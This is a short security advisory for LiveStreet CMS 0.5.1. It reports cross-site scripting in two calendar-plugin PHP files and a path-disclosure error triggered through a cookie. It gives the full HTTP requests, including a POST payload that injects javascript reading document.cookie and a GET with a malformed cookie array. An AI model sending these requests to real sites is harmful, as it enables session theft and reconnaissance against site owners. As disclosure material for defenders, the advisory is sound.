LiveStreet 0.5.1 Cross Site Scripting

2012.06.22
Credit: HiMIC
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

LiveStreet Cross-Site Scripting Vulnerabilities & disclosure of directory Vulnerable: LiveStreet 0.5.1 http://livestreetcms.com/download/ Remote: Yes Local: No Credit: HiMIC (Babichev Igor) Livestreet XSS POST: File: /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/year.php /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php -------------- POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1 Content-Length: 53 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled= Host: blog.himic.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22 ------------------ Disclosure of directory: The error occurs because of the variable key in Cookies, when you create it as an array key [] error climbs -------------- GET /index.php HTTP/1.1 Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; key[]=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled= Host: Livestreet.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* -------------- Site: http://blog.himic.ru/blog/security/162.html

References:

http://livestreetcms.com/download/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top